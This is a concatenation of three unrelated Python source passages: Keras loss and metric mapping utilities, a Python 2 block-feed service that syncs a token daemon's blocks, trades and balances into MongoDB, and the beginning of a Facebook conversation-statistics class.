"""Create pseudo input names for a subclassed Model."""
return _create_pseudo_names(inputs, prefix='input_')
def _create_pseudo_names(tensors, prefix):
"""Creates pseudo {input | output} names for subclassed Models.
Warning: this function should only be used to define default
names for `Metics` and `SavedModel`. No other use cases should
rely on a `Model`'s input or output names.
Example with dict:
`{'a': [x1, x2], 'b': x3}` becomes:
`['a_1', 'a_2', 'b']`
Example with list:
`[x, y]` becomes:
`['output_1', 'output_2']`
Args:
tensors: `Model`'s outputs or inputs.
prefix: 'output_' for outputs, 'input_' for inputs.
Returns:
Flattened list of pseudo names.
"""
def one_index(ele):
# Start with "output_1" instead of "output_0".
if isinstance(ele, int):
return ele + 1
return ele
flat_paths = list(nest.yield_flat_paths(tensors))
flat_paths = nest.map_structure(one_index, flat_paths)
names = []
for path in flat_paths:
if not path:
name = prefix + '1' # Single output.
else:
name = '_'.join(str(p) for p in path)
if isinstance(path[0], int):
name = prefix + name
names.append(name)
return names
def map_to_output_names(y_pred, output_names, struct):
"""Maps a dict to a list using `output_names` as keys.
This is a convenience feature only. When a `Model`'s outputs
are a list, you can specify per-output losses and metrics as
a dict, where the keys are the output names. If you specify
per-output losses and metrics via the same structure as the
`Model`'s outputs (recommended), no mapping is performed.
For the Functional API, the output names are the names of the
last layer of each output. For the Subclass API, the output names
are determined by `create_pseudo_output_names` (For example:
`['output_1', 'output_2']` for a list of outputs).
This mapping preserves backwards compatibility for `compile` and
`fit`.
Args:
y_pred: Sample outputs of the Model, to determine if this convenience
feature should be applied (`struct` is returned unmodified if `y_pred`
isn't a flat list).
output_names: List. The names of the outputs of the Model.
struct: The structure to map.
Returns:
`struct` mapped to a list in same order as `output_names`.
"""
single_output = not nest.is_nested(y_pred)
outputs_are_flat_list = (not single_output and
isinstance(y_pred, (list, tuple)) and
not any(nest.is_nested(y_p) for y_p in y_pred))
if (single_output or outputs_are_flat_list) and isinstance(struct, dict):
output_names = output_names or create_pseudo_output_names(y_pred)
struct = copy.copy(struct)
new_struct = [struct.pop(name, None) for name in output_names]
if struct:
raise ValueError('Found unexpected keys that do not correspond '
'to any Model output: {}. Expected: {}'.format(
struct.keys(), output_names))
if len(new_struct) == 1:
return new_struct[0]
return new_struct
else:
return struct
def map_missing_dict_keys(y_pred, struct):
"""Replaces missing dict keys in `struct` with `None` placeholders."""
if not isinstance(y_pred, dict) or not isinstance(struct, dict):
return struct
for k in y_pred.keys():
if k not in struct:
struct[k] = None
return struct
def match_dtype_and_rank(y_t, y_p, sw):
"""Match dtype and rank of predictions."""
if y_t.shape.rank == 1 and y_p.shape.rank == 2:
y_t = array_ops.expand_dims_v2(y_t, axis=-1)
if sw is not None:
if sw.shape.rank == 1 and y_p.shape.rank == 2:
sw = array_ops.expand_dims_v2(sw, axis=-1)
# Dtype.
# This is required mainly for custom loss functions which do not take care
# casting dtypes.
if ((y_t.dtype.is_floating and y_p.dtype.is_floating) or
(y_t.dtype.is_integer and y_p.dtype.is_integer)):
y_t = math_ops.cast(y_t, y_p.dtype)
if sw is not None:
sw = math_ops.cast(sw, y_p.dtype)
return y_t, y_p, sw
def get_mask(y_p):
"""Returns Keras mask from tensor."""
return getattr(y_p, '_keras_mask', None)
def apply_mask(y_p, sw, mask):
"""Applies any mask on predictions to sample weights."""
if mask is not None:
mask = math_ops.cast(mask, y_p.dtype)
if sw is not None:
mask, _, sw = (
losses_utils.squeeze_or_expand_dimensions(mask, sample_weight=sw))
sw *= mask
else:
sw = mask
return sw
def get_custom_object_name(obj):
"""Returns the name to use for a custom loss or metric callable.
Args:
obj: Custom loss of metric callable
Returns:
Name to use, or `None` if the object was not recognized.
"""
if hasattr(obj, 'name'): # Accept `Loss` instance as `Metric`.
return obj.name
elif hasattr(obj, '__name__'): # Function.
return obj.__name__
elif hasattr(obj, '__class__'): # Class instance.
return generic_utils.to_snake_case(obj.__class__.__name__)
else: # Unrecognized object.
return None
| |
"""
blockfeed: sync with and process new blocks from paytokensd
"""
import re
import os
import sys
import json
import copy
import logging
import datetime
import decimal
import ConfigParser
import time
import pymongo
import gevent
from lib import config, util, events, blockchain, util_jetcoin
from lib.components import assets, betting
D = decimal.Decimal
def process_cpd_blockfeed(zmq_publisher_eventfeed):
LATEST_BLOCK_INIT = {'block_index': config.BLOCK_FIRST, 'block_time': None, 'block_hash': None}
mongo_db = config.mongo_db
def blow_away_db():
"""boom! blow away all applicable collections in mongo"""
mongo_db.processed_blocks.drop()
mongo_db.tracked_assets.drop()
mongo_db.trades.drop()
mongo_db.balance_changes.drop()
mongo_db.asset_market_info.drop()
mongo_db.asset_marketcap_history.drop()
mongo_db.pair_market_info.drop()
mongo_db.jet_open_orders.drop()
mongo_db.asset_extended_info.drop()
mongo_db.transaction_stats.drop()
mongo_db.feeds.drop()
mongo_db.wallet_stats.drop()
#create/update default app_config object
mongo_db.app_config.update({}, {
'db_version': config.DB_VERSION, #payblockd database version
'running_testnet': config.TESTNET,
'paytokensd_db_version_major': None,
'paytokensd_db_version_minor': None,
'paytokensd_running_testnet': None,
'last_block_assets_compiled': config.BLOCK_FIRST, #for asset data compilation in events.py (resets on reparse as well)
}, upsert=True)
app_config = mongo_db.app_config.find()[0]
#DO NOT DELETE preferences and chat_handles and chat_history
#create XPT and JET assets in tracked_assets
for asset in [config.XPT, config.JET]:
base_asset = {
'asset': asset,
'owner': None,
'divisible': True,
'locked': False,
'total_issued': None,
'_at_block': config.BLOCK_FIRST, #the block ID this asset is current for
'_history': [] #to allow for block rollbacks
}
mongo_db.tracked_assets.insert(base_asset)
#reinitialize some internal counters
config.CURRENT_BLOCK_INDEX = 0
config.LAST_MESSAGE_INDEX = -1
return app_config
def prune_my_stale_blocks(max_block_index):
"""called if there are any records for blocks higher than this in the database? If so, they were impartially created
and we should get rid of them
NOTE: after calling this function, you should always trigger a "continue" statement to reiterate the processing loop
(which will get a new last_processed_block from paytokensd and resume as appropriate)
"""
logging.warn("Pruning to block %i ..." % (max_block_index))
mongo_db.processed_blocks.remove({"block_index": {"$gt": max_block_index}})
mongo_db.balance_changes.remove({"block_index": {"$gt": max_block_index}})
mongo_db.trades.remove({"block_index": {"$gt": max_block_index}})
mongo_db.asset_marketcap_history.remove({"block_index": {"$gt": max_block_index}})
mongo_db.transaction_stats.remove({"block_index": {"$gt": max_block_index}})
#to roll back the state of the tracked asset, dive into the history object for each asset that has
# been updated on or after the block that we are pruning back to
assets_to_prune = mongo_db.tracked_assets.find({'_at_block': {"$gt": max_block_index}})
for asset in assets_to_prune:
logging.info("Pruning asset %s (last modified @ block %i, pruning to state at block %i)" % (
asset['asset'], asset['_at_block'], max_block_index))
prev_ver = None
while len(asset['_history']):
prev_ver = asset['_history'].pop()
if prev_ver['_at_block'] <= max_block_index:
break
if prev_ver:
if prev_ver['_at_block'] > max_block_index:
#even the first history version is newer than max_block_index.
#in this case, just remove the asset tracking record itself
mongo_db.tracked_assets.remove({'asset': asset['asset']})
else:
#if here, we were able to find a previous version that was saved at or before max_block_index
# (which should be prev_ver ... restore asset's values to its values
prev_ver['_id'] = asset['_id']
prev_ver['_history'] = asset['_history']
mongo_db.tracked_assets.save(prev_ver)
config.CAUGHT_UP = False
latest_block = mongo_db.processed_blocks.find_one({"block_index": max_block_index}) or LATEST_BLOCK_INIT
return latest_block
def publish_mempool_tx():
"""fetch new tx from mempool"""
tx_hashes = []
mempool_txs = mongo_db.mempool.find(fields={'tx_hash': True})
for mempool_tx in mempool_txs:
tx_hashes.append(str(mempool_tx['tx_hash']))
params = None
if len(tx_hashes) > 0:
params = {
'filters': [
{'field':'tx_hash', 'op': 'NOT IN', 'value': tx_hashes},
{'field':'category', 'op': 'IN', 'value': ['sends', 'jetpays', 'issuances', 'dividends', 'callbacks']}
],
'filterop': 'AND'
}
new_txs = util.call_jsonrpc_api("get_mempool", params, abort_on_error=True)
for new_tx in new_txs['result']:
tx = {
'tx_hash': new_tx['tx_hash'],
'command': new_tx['command'],
'category': new_tx['category'],
'bindings': new_tx['bindings'],
'timestamp': new_tx['timestamp'],
'viewed_in_block': config.CURRENT_BLOCK_INDEX
}
mongo_db.mempool.insert(tx)
del(tx['_id'])
tx['_category'] = tx['category']
tx['_message_index'] = 'mempool'
logging.debug("Spotted mempool tx: %s" % tx)
zmq_publisher_eventfeed.send_json(tx)
def clean_mempool_tx():
"""clean mempool transactions older than MAX_REORG_NUM_BLOCKS blocks"""
mongo_db.mempool.remove({"viewed_in_block": {"$lt": config.CURRENT_BLOCK_INDEX - config.MAX_REORG_NUM_BLOCKS}})
config.CURRENT_BLOCK_INDEX = 0 #initialize (last processed block index -- i.e. currently active block)
config.LAST_MESSAGE_INDEX = -1 #initialize (last processed message index)
config.BLOCKCHAIN_SERVICE_LAST_BLOCK = 0 #simply for printing/alerting purposes
config.CAUGHT_UP_STARTED_EVENTS = False
#^ set after we are caught up and start up the recurring events that depend on us being caught up with the blockchain
#grab our stored preferences, and rebuild the database if necessary
app_config = mongo_db.app_config.find()
assert app_config.count() in [0, 1]
if ( app_config.count() == 0
or config.REPARSE_FORCED
or app_config[0]['db_version'] != config.DB_VERSION
or app_config[0]['running_testnet'] != config.TESTNET):
if app_config.count():
logging.warn("payblockd database version UPDATED (from %i to %i) or testnet setting changed (from %s to %s), or REINIT forced (%s). REBUILDING FROM SCRATCH ..." % (
app_config[0]['db_version'], config.DB_VERSION, app_config[0]['running_testnet'], config.TESTNET, config.REPARSE_FORCED))
else:
logging.warn("payblockd database app_config collection doesn't exist. BUILDING FROM SCRATCH...")
app_config = blow_away_db()
my_latest_block = LATEST_BLOCK_INIT
else:
app_config = app_config[0]
#get the last processed block out of mongo
my_latest_block = mongo_db.processed_blocks.find_one(sort=[("block_index", pymongo.DESCENDING)]) or LATEST_BLOCK_INIT
#remove any data we have for blocks higher than this (would happen if payblockd or mongo died
# or errored out while processing a block)
my_latest_block = prune_my_stale_blocks(my_latest_block['block_index'])
#start polling paytokensd for new blocks
while True:
try:
running_info = util.call_jsonrpc_api("get_running_info", abort_on_error=True)
if 'result' not in running_info:
raise AssertionError("Could not contact paytokensd")
running_info = running_info['result']
except Exception, e:
logging.warn(str(e) + " -- Waiting 3 seconds before trying again...")
time.sleep(3)
continue
if running_info['last_message_index'] == -1: #last_message_index not set yet (due to no messages in paytokensd DB yet)
logging.warn("No last_message_index returned. Waiting until paytokensd has messages...")
time.sleep(10)
continue
#wipe our state data if necessary, if paytokensd has moved on to a new DB version
wipeState = False
updatePrefs = False
if app_config['paytokensd_db_version_major'] is None \
or app_config['paytokensd_db_version_minor'] is None \
or app_config['paytokensd_running_testnet'] is None:
updatePrefs = True
elif running_info['version_major'] != app_config['paytokensd_db_version_major']:
logging.warn("paytokensd MAJOR DB version change (we built from %s, paytokensd is at %s). Wiping our state data." % (
app_config['paytokensd_db_version_major'], running_info['version_major']))
wipeState = True
updatePrefs = True
elif running_info['version_minor'] != app_config['paytokensd_db_version_minor']:
logging.warn("paytokensd MINOR DB version change (we built from %s.%s, paytokensd is at %s.%s). Wiping our state data." % (
app_config['paytokensd_db_version_major'], app_config['paytokensd_db_version_minor'],
running_info['version_major'], running_info['version_minor']))
wipeState = True
updatePrefs = True
elif running_info.get('running_testnet', False) != app_config['paytokensd_running_testnet']:
logging.warn("paytokensd testnet setting change (from %s to %s). Wiping our state data." % (
app_config['paytokensd_running_testnet'], running_info['running_testnet']))
wipeState = True
updatePrefs = True
if wipeState:
app_config = blow_away_db()
if updatePrefs:
app_config['paytokensd_db_version_major'] = running_info['version_major']
app_config['paytokensd_db_version_minor'] = running_info['version_minor']
app_config['paytokensd_running_testnet'] = running_info['running_testnet']
mongo_db.app_config.update({}, app_config)
#reset my latest block record
my_latest_block = LATEST_BLOCK_INIT
config.CAUGHT_UP = False #You've Come a Long Way, Baby
#work up to what block paytokensd is at
last_processed_block = running_info['last_block']
if last_processed_block['block_index'] is None:
logging.warn("paytokensd has no last processed block (probably is reparsing). Waiting 3 seconds before trying again...")
time.sleep(3)
continue
if my_latest_block['block_index'] < last_processed_block['block_index']:
#need to catch up
config.CAUGHT_UP = False
cur_block_index = my_latest_block['block_index'] + 1
#get the blocktime for the next block we have to process
try:
cur_block = util.call_jsonrpc_api("get_block_info",
{'block_index': cur_block_index}, abort_on_error=True)['result']
except Exception, e:
logging.warn(str(e) + " Waiting 3 seconds before trying again...")
time.sleep(3)
continue
cur_block['block_time_obj'] = datetime.datetime.utcfromtimestamp(cur_block['block_time'])
cur_block['block_time_str'] = cur_block['block_time_obj'].isoformat()
try:
block_data = util.call_jsonrpc_api("get_messages",
{'block_index': cur_block_index}, abort_on_error=True)['result']
except Exception, e:
logging.warn(str(e) + " Waiting 5 seconds before trying again...")
time.sleep(5)
continue
# clean api cache
util.clean_block_cache(cur_block_index)
#parse out response (list of txns, ordered as they appeared in the block)
for msg in block_data:
msg_data = json.loads(msg['bindings'])
if msg['message_index'] != config.LAST_MESSAGE_INDEX + 1 and config.LAST_MESSAGE_INDEX != -1:
logging.error("BUG: MESSAGE RECEIVED NOT WHAT WE EXPECTED. EXPECTED: %s, GOT: %s: %s (ALL MSGS IN get_messages PAYLOAD: %s)..." % (
config.LAST_MESSAGE_INDEX + 1, msg['message_index'], msg, [m['message_index'] for m in block_data]))
#sys.exit(1) #FOR NOW
#BUG: sometimes paytokensd seems to return OLD messages out of the message feed. deal with those
if msg['message_index'] <= config.LAST_MESSAGE_INDEX:
logging.warn("BUG: IGNORED old RAW message %s: %s ..." % (msg['message_index'], msg))
continue
logging.info("Received message %s: %s ..." % (msg['message_index'], msg))
#don't process invalid messages, but do forward them along to clients
status = msg_data.get('status', 'valid').lower()
if status.startswith('invalid'):
#(but don't forward along while we're catching up)
if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
event = util.decorate_message_for_feed(msg, msg_data=msg_data)
zmq_publisher_eventfeed.send_json(event)
config.LAST_MESSAGE_INDEX = msg['message_index']
continue
#track message types, for compiling of statistics
if msg['command'] == 'insert' \
and msg['category'] not in ["debits", "credits", "order_matches", "bet_matches",
"order_expirations", "bet_expirations", "order_match_expirations", "bet_match_expirations",
"rps_matches", "rps_expirations", "rps_match_expirations", "bet_match_resolutions"]:
mongo_db.transaction_stats.insert({
'block_index': cur_block_index,
'block_time': cur_block['block_time_obj'],
'message_index': msg['message_index'],
'category': msg['category']
})
#HANDLE REORGS
if msg['command'] == 'reorg':
logging.warn("Blockchain reorginization at block %s" % msg_data['block_index'])
#prune back to and including the specified message_index
my_latest_block = prune_my_stale_blocks(msg_data['block_index'] - 1)
config.CURRENT_BLOCK_INDEX = msg_data['block_index'] - 1
#for the current last_message_index (which could have gone down after the reorg), query paytokensd
running_info = util.call_jsonrpc_api("get_running_info", abort_on_error=True)['result']
config.LAST_MESSAGE_INDEX = running_info['last_message_index']
#send out the message to listening clients (but don't forward along while we're catching up)
if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
msg_data['_last_message_index'] = config.LAST_MESSAGE_INDEX
event = util.decorate_message_for_feed(msg, msg_data=msg_data)
zmq_publisher_eventfeed.send_json(event)
break #break out of inner loop
#track assets
if msg['category'] == 'issuances':
assets.parse_issuance(mongo_db, msg_data, cur_block_index, cur_block)
#track balance changes for each address
bal_change = None
if msg['category'] in ['credits', 'debits',]:
actionName = 'credit' if msg['category'] == 'credits' else 'debit'
address = msg_data['address']
asset_info = mongo_db.tracked_assets.find_one({ 'asset': msg_data['asset'] })
if asset_info is None:
logging.warn("Credit/debit of %s where asset ('%s') does not exist. Ignoring..." % (msg_data['quantity'], msg_data['asset']))
continue
quantity = msg_data['quantity'] if msg['category'] == 'credits' else -msg_data['quantity']
quantity_normalized = util_jetcoin.normalize_quantity(quantity, asset_info['divisible'])
#look up the previous balance to go off of
last_bal_change = mongo_db.balance_changes.find_one({
'address': address,
'asset': asset_info['asset']
}, sort=[("block_index", pymongo.DESCENDING), ("_id", pymongo.DESCENDING)])
if last_bal_change \
and last_bal_change['block_index'] == cur_block_index:
#modify this record, as we want at most one entry per block index for each (address, asset) pair
last_bal_change['quantity'] += quantity
last_bal_change['quantity_normalized'] += quantity_normalized
last_bal_change['new_balance'] += quantity
last_bal_change['new_balance_normalized'] += quantity_normalized
mongo_db.balance_changes.save(last_bal_change)
logging.info("Procesed %s bal change (UPDATED) from tx %s :: %s" % (actionName, msg['message_index'], last_bal_change))
bal_change = last_bal_change
else: #new balance change record for this block
bal_change = {
'address': address,
'asset': asset_info['asset'],
'block_index': cur_block_index,
'block_time': cur_block['block_time_obj'],
'quantity': quantity,
'quantity_normalized': quantity_normalized,
'new_balance': last_bal_change['new_balance'] + quantity if last_bal_change else quantity,
'new_balance_normalized': last_bal_change['new_balance_normalized'] + quantity_normalized if last_bal_change else quantity_normalized,
}
mongo_db.balance_changes.insert(bal_change)
logging.info("Procesed %s bal change from tx %s :: %s" % (actionName, msg['message_index'], bal_change))
#book trades
if (msg['category'] == 'order_matches'
and ((msg['command'] == 'update' and msg_data['status'] == 'completed') #for a trade with JET involved, but that is settled (completed)
or ('forward_asset' in msg_data and msg_data['forward_asset'] != config.JET and msg_data['backward_asset'] != config.JET))): #or for a trade without JET on either end
if msg['command'] == 'update' and msg_data['status'] == 'completed':
#an order is being updated to a completed status (i.e. a JETpay has completed)
tx0_hash, tx1_hash = msg_data['order_match_id'][:64], msg_data['order_match_id'][64:]
#get the order_match this jetpay settles
order_match = util.call_jsonrpc_api("get_order_matches",
{'filters': [
{'field': 'tx0_hash', 'op': '==', 'value': tx0_hash},
{'field': 'tx1_hash', 'op': '==', 'value': tx1_hash}]
}, abort_on_error=True)['result'][0]
else:
assert msg_data['status'] == 'completed' #should not enter a pending state for non JET matches
order_match = msg_data
forward_asset_info = mongo_db.tracked_assets.find_one({'asset': order_match['forward_asset']})
backward_asset_info = mongo_db.tracked_assets.find_one({'asset': order_match['backward_asset']})
assert forward_asset_info and backward_asset_info
base_asset, quote_asset = util.assets_to_asset_pair(order_match['forward_asset'], order_match['backward_asset'])
#don't create trade records from order matches with JET that are under the dust limit
if (order_match['forward_asset'] == config.JET and order_match['forward_quantity'] <= config.ORDER_JET_DUST_LIMIT_CUTOFF) \
or (order_match['backward_asset'] == config.JET and order_match['backward_quantity'] <= config.ORDER_JET_DUST_LIMIT_CUTOFF):
logging.debug("Order match %s ignored due to %s under dust limit." % (order_match['tx0_hash'] + order_match['tx1_hash'], config.JET))
continue
#take divisible trade quantities to floating point
forward_quantity = util_jetcoin.normalize_quantity(order_match['forward_quantity'], forward_asset_info['divisible'])
backward_quantity = util_jetcoin.normalize_quantity(order_match['backward_quantity'], backward_asset_info['divisible'])
#compose trade
trade = {
'block_index': cur_block_index,
'block_time': cur_block['block_time_obj'],
'message_index': msg['message_index'], #secondary temporaral ordering off of when
'order_match_id': order_match['tx0_hash'] + order_match['tx1_hash'],
'order_match_tx0_index': order_match['tx0_index'],
'order_match_tx1_index': order_match['tx1_index'],
'order_match_tx0_address': order_match['tx0_address'],
'order_match_tx1_address': order_match['tx1_address'],
'base_asset': base_asset,
'quote_asset': quote_asset,
'base_quantity': order_match['forward_quantity'] if order_match['forward_asset'] == base_asset else order_match['backward_quantity'],
'quote_quantity': order_match['backward_quantity'] if order_match['forward_asset'] == base_asset else order_match['forward_quantity'],
'base_quantity_normalized': forward_quantity if order_match['forward_asset'] == base_asset else backward_quantity,
'quote_quantity_normalized': backward_quantity if order_match['forward_asset'] == base_asset else forward_quantity,
}
trade['unit_price'] = float(
( D(trade['quote_quantity_normalized']) / D(trade['base_quantity_normalized']) ).quantize(
D('.00000000'), rounding=decimal.ROUND_HALF_EVEN))
trade['unit_price_inverse'] = float(
( D(trade['base_quantity_normalized']) / D(trade['quote_quantity_normalized']) ).quantize(
D('.00000000'), rounding=decimal.ROUND_HALF_EVEN))
mongo_db.trades.insert(trade)
logging.info("Procesed Trade from tx %s :: %s" % (msg['message_index'], trade))
#broadcast
if msg['category'] == 'broadcasts':
betting.parse_broadcast(mongo_db, msg_data)
#if we're catching up beyond MAX_REORG_NUM_BLOCKS blocks out, make sure not to send out any socket.io
# events, as to not flood on a resync (as we may give a 525 to kick the logged in clients out, but we
# can't guarantee that the socket.io connection will always be severed as well??)
if last_processed_block['block_index'] - my_latest_block['block_index'] < config.MAX_REORG_NUM_BLOCKS:
#send out the message to listening clients
event = util.decorate_message_for_feed(msg, msg_data=msg_data)
zmq_publisher_eventfeed.send_json(event)
#this is the last processed message index
config.LAST_MESSAGE_INDEX = msg['message_index']
#block successfully processed, track this in our DB
new_block = {
'block_index': cur_block_index,
'block_time': cur_block['block_time_obj'],
'block_hash': cur_block['block_hash'],
}
mongo_db.processed_blocks.insert(new_block)
my_latest_block = new_block
config.CURRENT_BLOCK_INDEX = cur_block_index
#get the current blockchain service block
if config.BLOCKCHAIN_SERVICE_LAST_BLOCK == 0 or config.BLOCKCHAIN_SERVICE_LAST_BLOCK - config.CURRENT_BLOCK_INDEX < config.MAX_REORG_NUM_BLOCKS:
#update as CURRENT_BLOCK_INDEX catches up with BLOCKCHAIN_SERVICE_LAST_BLOCK and/or surpasses it (i.e. if blockchain service gets behind for some reason)
try:
block_height_response = blockchain.getinfo()
except:
block_height_response = None
config.BLOCKCHAIN_SERVICE_LAST_BLOCK = block_height_response['info']['blocks'] if block_height_response else 0
logging.info("Block: %i (message_index height=%s) (blockchain latest block=%s)" % (config.CURRENT_BLOCK_INDEX,
config.LAST_MESSAGE_INDEX if config.LAST_MESSAGE_INDEX != -1 else '???',
config.BLOCKCHAIN_SERVICE_LAST_BLOCK if config.BLOCKCHAIN_SERVICE_LAST_BLOCK else '???'))
clean_mempool_tx()
elif my_latest_block['block_index'] > last_processed_block['block_index']:
#we have stale blocks (i.e. most likely a reorg happened in paytokensd)?? this shouldn't happen, as we
# should get a reorg message. Just to be on the safe side, prune back MAX_REORG_NUM_BLOCKS blocks
# before what paytokensd is saying if we see this
logging.error("Very odd: Ahead of paytokensd with block indexes! Pruning back %s blocks to be safe." % config.MAX_REORG_NUM_BLOCKS)
my_latest_block = prune_my_stale_blocks(last_processed_block['block_index'] - config.MAX_REORG_NUM_BLOCKS)
else:
#...we may be caught up (to paytokensd), but paytokensd may not be (to the blockchain). And if it isn't, we aren't
config.CAUGHT_UP = running_info['db_caught_up']
#this logic here will cover a case where we shut down payblockd, then start it up again quickly...
# in that case, there are no new blocks for it to parse, so LAST_MESSAGE_INDEX would otherwise remain 0.
# With this logic, we will correctly initialize LAST_MESSAGE_INDEX to the last message ID of the last processed block
if config.LAST_MESSAGE_INDEX == -1 or config.CURRENT_BLOCK_INDEX == 0:
if config.LAST_MESSAGE_INDEX == -1: config.LAST_MESSAGE_INDEX = running_info['last_message_index']
if config.CURRENT_BLOCK_INDEX == 0: config.CURRENT_BLOCK_INDEX = running_info['last_block']['block_index']
logging.info("Detected blocks caught up on startup. Setting last message idx to %s, current block index to %s ..." % (
config.LAST_MESSAGE_INDEX, config.CURRENT_BLOCK_INDEX))
if config.CAUGHT_UP and not config.CAUGHT_UP_STARTED_EVENTS:
#start up recurring events that depend on us being fully caught up with the blockchain to run
logging.debug("Starting event timer: compile_asset_pair_market_info")
gevent.spawn(events.compile_asset_pair_market_info)
logging.debug("Starting event timer: compile_asset_market_info")
gevent.spawn(events.compile_asset_market_info)
logging.debug("Starting event timer: compile_extended_asset_info")
gevent.spawn(events.compile_extended_asset_info)
logging.debug("Starting event timer: compile_extended_feed_info")
gevent.spawn(events.compile_extended_feed_info)
config.CAUGHT_UP_STARTED_EVENTS = True
publish_mempool_tx()
time.sleep(2) #payblockd itself is at least caught up, wait a bit to query again for the latest block from cpd
| |
from datetime import date, datetime, time
import math
from dateutil.rrule import rrule, DAILY, MONTHLY
import matplotlib.pyplot as plt
import networkx as nx
import nltk
from scipy.stats import chisquare
from message import Message
import plot
class EmptyConversationError(Exception):
"""
Raised when we try to instantiate a Conversation object with no messages.
"""
pass
# TODO: change timestamp to datetime
# TODO: user_to_message statistic can combine user filter and time_interval_to_message_statistic
'''
Represents a Facebook conversation.
'''
class Conversation:
SECONDS_PER_MINUTE = 60
MINUTES_PER_HOUR = 60
HOURS_PER_DAY = 24
MONTHS_PER_YEAR = 12
MONTH_FORMAT = '%Y-%m'
TIME_INTERVALS = [
'minute in hour',
'minute in day',
'hour',
'date',
'week',
'month',
'year',
]
def __init__(self, messages, users):
"""
Args:
messages: A nonempty list of Message objects in chronological
order.
users: A list of strings representing the users in the
conversation.
"""
self.messages = messages
self.users = users
self.users_in_messages = set([message.user for message in self.messages])
# Union of users specified by the conversation and users that send at
# least one message. In general, these sets can be different. A user
# can be in first set but not in the second set if he never sends a
# message. A user can be in the second set but not the first set if he
# was originally in the conversation, sent at least one message, and
# then left the conversation.
self.users_union = set(self.users).union(self.users_in_messages)
if len(self.messages) == 0:
raise EmptyConversationError()
if not self.messages_are_sorted():
raise ValueError('messages must be sorted by timestamp')
def __str__(self):
users_ascii = [user.encode('utf-8') for user in self.users]
return '\n'.join(['Conversation with the users ' + str(users_ascii)] + [str(message) for message in self.messages])
def __len__(self):
return len(self.messages)
def __eq__(self, other):
return (self.messages, set(self.users)) == (other.messages, set(other.users))
def __ne__(self, other):
return not self.__eq__(other)
def messages_are_sorted(self):
message_timestamps = [message.timestamp for message in self.messages]
return message_timestamps == sorted(message_timestamps)
def filter_conversation(self, message_filter=lambda x: True,
user_filter=lambda x: True):
"""
Creates a new Conversation object after filtering self.messages and
self.users.
Args:
message_filter: A function that takes a Message object as input and
returns True or False.
user_filter: A function that takes a string as input and returns
True or False.
Returns:
filtered_conversation: A Conversation object whose messages are
self.messages after being filtered by message_filter and whose
users are self.users after being filtered by user_filter.
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
filtered_messages = filter(message_filter, self.messages)
filtered_users = filter(user_filter, self.users)
return Conversation(filtered_messages, filtered_users)
def filter_by_datetime(self, start_dt=datetime.min, end_dt=datetime.max):
"""
Returns a copy of self after filtering self.messages by messages that
lie in a datetime interval.
Args:
start_dt: A datetime object satisfying start_dt <= end_dt.
end_dt: A datetime object satisfying start_dt <= end_dt.
Returns:
A Conversation object that is equal to self after filtering by
messages whose datetimes are in the closed interval
[start_dt, end_dt].
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
if start_dt > end_dt:
raise ValueError("start_dt must be less than or equal to end_dt")
message_filter = lambda x: x.timestamp >= start_dt and x.timestamp <= end_dt
filtered = self.filter_conversation(message_filter=message_filter)
return filtered
def filter_by_users(self, users):
"""
Returns a copy of self after filtering self.messages by messages whose
users are in an input user list and after filtering self.users by users
in the input user list.
Args:
users: A list of strings representing users.
Returns:
A Conversation object that is equal to self after filtering
self.messages to only contain messages whose user is in users
and after filtering self.users to only contain users in users.
Raises:
EmptyConversationError: Filtering self.messages results in an empty
list.
"""
users_set = set(users)
message_filter = lambda x: x.user in users_set
user_filter = lambda x: x in users_set
filtered = self.filter_conversation(message_filter, user_filter)
return filtered
def filter_by_text_filter(self, text_filter):
message_filter = lambda x: text_filter(x.text)
filtered = self.filter_conversation(message_filter=message_filter)
return filtered
def get_minute_in_hour_to_message_statistic(self, message_statistic):
"""
Maps each minute in an hour to the sum of the values of a message
statistic over all messages from that minute.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
minute_in_hour_to_message_statistic: A dict mapping each integer in
range(60) to the sum of the values of message_statistic over
all messages in self.messages from that minute.
"""
minute_in_hour_to_message_statistic = {minute: 0 for minute in range(self.MINUTES_PER_HOUR)}
for message in self.messages:
minute_in_hour_to_message_statistic[message.timestamp.minute] += message_statistic(message)
return minute_in_hour_to_message_statistic
def get_minute_in_day_to_message_statistic(self, message_statistic):
"""
Maps each minute in a day to the sum of the values of a message
statistic over all messages from that minute.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
minute_in_day_to_message_statistic: A dict mapping a time object
representing a minute in a day to the sum of the values of
message_statistic over all messages in self.messages from that
minute.
"""
minute_in_day_to_message_statistic = {}
for hour in range(self.HOURS_PER_DAY):
for minute in range(self.MINUTES_PER_HOUR):
minute_in_day = time(hour, minute)
minute_in_day_to_message_statistic[minute_in_day] = 0
for message in self.messages:
minute_in_day = time(message.timestamp.hour, message.timestamp.minute)
minute_in_day_to_message_statistic[minute_in_day] += message_statistic(message)
return minute_in_day_to_message_statistic
def get_hour_to_message_statistic(self, message_statistic):
"""
Maps each hour to the sum of the values of a message statistic over all
messages from that hour.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
hour_to_message_statistic: A dict mapping each integer in
range(24) to the sum of the values of message_statistic over
all messages in self.messages from that hour.
"""
hour_to_message_statistic = {hour: 0 for hour in range(self.HOURS_PER_DAY)}
for message in self.messages:
hour_to_message_statistic[message.timestamp.hour] += message_statistic(message)
return hour_to_message_statistic
def get_date_to_message_statistic(self, message_statistic):
"""
Maps each date between the date of the first message and the date of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that date.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
date_to_message_statistic: A dict mapping a date object between the
date of the first message and the date of the last message to
the sum of the values of message_statistic over all messages in
self.messages from that date.
"""
start_date = self.messages[0].timestamp.date()
end_date = self.messages[-1].timestamp.date()
date_range = [dt.date() for dt in rrule(DAILY, dtstart=start_date, until=end_date)]
date_to_message_statistic = {d: 0 for d in date_range}
for message in self.messages:
date_to_message_statistic[message.timestamp.date()] += message_statistic(message)
return date_to_message_statistic
def get_month_to_message_statistic(self, message_statistic):
"""
Maps each month between the month of the first message and the month of
the last message, inclusive, to the sum of the values of a message
statistic over all messages from that month.
Args:
message_statistic: A function mapping a Message object to an int or
a float.
Returns:
month_to_message_statistic: A dict mapping a string of the form
